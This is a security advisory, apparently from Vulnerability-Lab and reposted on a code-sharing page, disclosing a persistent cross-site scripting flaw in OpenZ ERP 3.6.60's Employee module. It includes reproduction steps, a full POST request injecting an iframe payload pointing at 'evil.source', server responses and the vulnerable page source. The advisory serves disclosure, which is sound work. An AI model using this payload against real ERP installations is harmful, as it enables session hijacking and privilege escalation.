扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 |
# Exploit Title: OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting # Date: 2020-05-11 # Exploit Author: Vulnerability-Lab # Vendor: https://www.openz.de/ # https://www.openz.de/download.html Document Title: =============== OpenZ v3.6.60 ERP - Employee Persistent XSS Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2234 Common Vulnerability Scoring System: ==================================== 4.6 Product & Service Introduction: =============================== <blockquote class="wp-embedded-content" data-secret="ifWcCcgB80"><a href="https://openz.de/" target="_blank"rel="external nofollow" class="external" >OpenZ | Offizielle Homepage | Open Source ERP / WaWi</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="„OpenZ | Offizielle Homepage | Open Source ERP / WaWi“ — OpenZ - Open Source ERP System, Warenwirtschaft und mehr" src="https://openz.de/embed/#?secret=UtnVuG33yF#?secret=ifWcCcgB80" data-secret="ifWcCcgB80" frameborder="0" marginmarginscrolling="no"></iframe> https://www.openz.de/download.html Affected Product(s): ==================== OpenZ Product: OpenZ v3.6.60 - ERP (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-05-06: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent cross site scripting web vulnerability has been discovered in the official OpenZ v3.6.60 ERP web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent vulnerability is located in the <code>inpname</code> and inpdescripción</code> parameters of the <code>Employee</code> add/register/edit module in the <code>menu.html</code> file. Remote attackers with low privileges are able to inject own malicious persistent script code as name or description. The injected code can be used to attack the frontend or backend of the web-application. The request method to inject is POST and the attack vector is located on the application-side. The attack can be triggered from low privilege user accounts against higher privilege user accounts like manager or administrators to elevate privileges via session hijacking. Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Employee Vulnerable Input(s): [+] Mitarbeiter Name [+] Beschreibung Vulnerable File(s): [+] Menu.html Vulnerable Parameter(s): [+] inpname [+] inpdescription Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by low privileged web application user account with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the openz web-application 2. Register, add or edit via profile settings the inpname & inpdescription parameter inputs 3. Edit inpname & inpdescription parameter of the profile and save the entry Note: The execute occurs on preview of the user credentials in the /org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html 4. Successful reproduce of the persistent web vulnerability! --- POC Session Logs [POST] --- (Inject via Add / Edit) https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html Host: localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 1464 Origin: https://localhost:8080 Connection: keep-alive Referer: https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544; _ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275 Command=SAVE_EDIT_RELATION&inpLastFieldChanged=inpdescription&inpkeyColumnIdInp=&inpParentKeyColumn=&inpDirectKey=& inpKeyReferenceColumnName=&inpTableReferenceId=&inpKeyReferenceId=&autosave=N&inpnewdatasetindicator=&inpnewdataseIdVal=& inpenabledautosave=Y&inpisemployee=Y&inpistaxexempt=N&inpadClientId=C726FEC915A54A0995C568555DA5BB3C&inpaAssetId=& inpcGreetingId=&inpcBpartnerId=8BEB3E9FD5D24F9BBCF777A51D53F5AF&inpissummary=N&inprating=N&inpTableId=AC9B98C649CD4F55B37714008EE8519F& inpkeyColumnId=C_BPartner_ID&inpKeyName=inpcBpartnerId&mappingName=/org.openbravo.zsoft.smartui.Employee/ EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html&inpwindowId=39D3CD9F77A942D690965D49106F011B& inpTabId=A3D0B320B69845B386024B5FF6B1E266&inpCommandType=EDIT&updatedTimestamp=20200426170335&inpParentOrganization=& inpadOrgId=1AF9E07685234E0A9FEC1D9B58A4876B&inpadImageId=& inpvalue=325235&inpname=>"><iframe src=evil.source><iframe></iframe></iframe>& inpdescription=>"><iframe src=evil.source><iframe></iframe></iframe>&inpimageurl=31337& inpisactive=Y&inpisinresourceplan=Y&inpapprovalamt=0,00&inpcSalaryCategoryId=&inptaxid=&inpreferenceno=& inpcBpGroupId=42691AE1D13F400AB814B70361E167C3&inpadLanguage=de_DE&inpcountry=Deutschland&inpzipcode=& inpcity=&inpcreated=26-04-2020 17:03:35&inpcreatedby=Service&inpupdated=26-04-2020 17:03:35&inpupdatedby=Service - POST: HTTP/1.1 302 Found Server: Apache/2.4.38 (Debian) Location: https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html?Command=RELATION Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 - (Execution in Listing) https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/evil.source Host: myerponline.de Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer: https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544; _ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275 - GET: HTTP/1.1 200 OK Server: Apache/2.4.38 (Debian) Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 1110 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive PoC: Vulnerable Source (/security/Menu.html) <table width="0px" height="0px" cellspacing="0" cellpadding="0"> <tbody><tr> <td><input type="text" class="DataGrid_Table_Dummy_Input" id="grid_table_dummy_input"></td> </tr> </tbody></table> <input type="hidden" name="inpcBpartnerId" value="8BEB3E9FD5D24F9BBCF777A51D53F5AF" id="keyParent"> <div class="RelationInfoContainer"> <table class="RelationInfo"> <tbody><tr> <td class="RelationInfoTitle" id="related_info_cont">Business Partner:</td> <td class="RelationInfoContent" id="paramParentC_BPartner_ID">325235 - >"><iframe src="a"></TD> </TR> Reference(s): https://localhost:8080/ https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/ https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/Employee Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. -- VULNERABILITY LABORATORY - RESEARCH TEAM |
体验盒子
